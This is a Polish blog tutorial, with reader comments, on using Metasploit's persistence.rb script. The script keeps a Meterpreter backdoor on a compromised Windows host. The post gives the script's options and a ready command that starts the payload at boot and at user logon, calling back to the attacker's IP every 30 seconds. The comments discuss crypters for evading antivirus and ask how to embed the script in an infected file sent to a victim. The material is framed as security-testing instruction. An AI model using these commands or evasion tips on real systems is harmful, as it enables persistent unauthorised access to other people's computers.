Autostart w payload Metasploit (persistence)

Jeśli korzystałeś już kiedyś z pakietu Metasploit Framework, na pewno nie jest Ci obce pojęcie Meterpretera. Jest jedna znacząca wada tego narzędzia w domyślnej konfiguracji – nie uruchamia się automatycznie wraz z startem badanego systemu operacyjnego.

Jednak tą niedogodność można bardzo szybko naprawić, za pomocą dołączonego skryptu napisanego w Ruby o jakże znaczącej nazwie persistence.

Cyberprzestępca-„haker” może właśnie w ten sposób utworzyć sobie tylną furtkę (backdoor), umożliwiającą w przyszłości na powrót do zaatakowanego systemu operacyjnego.

Autostart Meterpretera

Do uruchomienia w meterpreterze zewnętrznych skryptów służy następujące polecenie:

run <nazwa_skryptu> <argumenty opcjonalne>

Sprawdźmy sobie w swoim Kalim za pomocą argumentu pomocy -h, jakie argumenty opcjonalne może przyjmować  skrypt persistence.rb.

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

   -A Automatically start a matching exploit/multi/handler to connect to the agent
   -L <opt> Location in target host to write payload to, if none %TEMP% will be used.
   -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
   -S Automatically start the agent on boot as a service (with SYSTEM privileges)
   -T <opt> Alternate executable template to use
   -U Automatically start the agent when the User logs on
   -X Automatically start the agent when the system boots
   -h This help menu
   -i <opt> The interval in seconds between each connection attempt
   -p <opt> The port on which the system running Metasploit is listening
   -r <opt> The IP of the system running Metasploit listening for the connect back

Oczywiście w przypadku, gdy przy argumencie występuje <opt> należy uzupełnić daną opcje dodatkową wartością argumentu.

Jak użyć persistence.rb w praktyce

Jeśli chciałbyś skorzystać z automatycznego startu meterpretera to sprawa jest bardzo prosta. Po uzyskaniu połączenia z meterpreterem wydaj w nim następujące polecenie:

run persistence -X -U -i 30 -p 16666 -r 192.168.0.19

Oczywiście ustawiliśmy automatyczne uruchomienie po starcie systemu operacyjnego lub w przypadku przelogowania się usera (-X, -U).

Za pomocą parametru -i wymusiliśmy cykliczną próbę łączenia się z naszym komputerem co 30 sekund. Oczywiście ustawiliśmy odpowiedni port i nasz adres IP za pomocą parametru -p i -r.

Powyższe polecenie jest dedykowane powłokom, które mają się z nami łączyć za pomocą odwrotnych połączeń (reverse_tcp). Warto się również pobawić pozostałymi parametrami.

To by było na tyle na dziś. Jeśli trafiłeś tutaj, a nie wiesz nadal o czym mowa, polecam zapoznać się Tobie z naszym poradnikiem o tworzeniu payload w systemie Kali Linux. Warto poznać to narzędzie, ponieważ programiści poświęcili multum czasu na implementacje olbrzymiej liczby przydatnych podczas testów bezpieczeństwa funkcji. Powodzenia!

11 thoughts to “Autostart w payload Metasploit (persistence)”

    1. Pod warunkiem, że nie używa się cryptera lub nie jest to dopiero co nowa wersja Metaspolita. Szczerze mówiąc kilka sztuczek i można zejść praktycznie do poziomu FUD, jednak przy audycie bezpieczeństwa jest to zbędne. Sprawdza się wtedy czy potencjalny „amator” włamywacz da rade się włamać, a nie siłę włamuje. To tak jakby audytować hasła w firmie 15 znakowe co nie ma sensu.

    1. Do tego celu wykorzystuje się cryptery. Nawet pakiet Metaspolit miał kiedyś moduł MSFencode. Teraz został on zintegorwany z msfvenom. Logiczne jest, że gdy w dniu premiery pakietu coś jest niewykrywalne to po kilku tygodniach już jest znane dla sygnatur AV. Przestępcy piszą aktorski kod lub zlecają to zewnętrznym programistom, a nie wykorzystują do takich akurat celów publicznie dostępnych pakietów dla audytorów bezpieczeństwa. Taki pakiet ma sens tylko w przypadku zawodowych etycznych hakerów pracujących na etacie w branży Security IT.

  1. Dzięki za pomoc. Ale takie małe pytanko. Jak zmienić kolor liter w terminalu, aby nie pokazywały się białe tylko np.:niebieskie lub żółte? Może to trochę odbiega od tematu, ale proszę o odpowiedź bo nigdzie nie mogę tego znaleźć.

    1. Prawy przycisk myszy w obszarze terminala, następnie profile i preferencje profilu. Tam znajdziesz wszystko np: w zakładce kolory :-).

  2. Witam.
    Po wpisaniu komendy: run persistence -h pojawia sie błąd–> Error in script: RangeError bignum too big to convert into `long’. Mozna to jakos ominąć.

  3. Czy ten skrypt można rowniez dolaczyc do pliku z wygenerowanym exploitem? Tak, żeby uruchomienie zakażonego pliku na komputerze ofiary od razu uruchomiło skrypt autostartowy

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.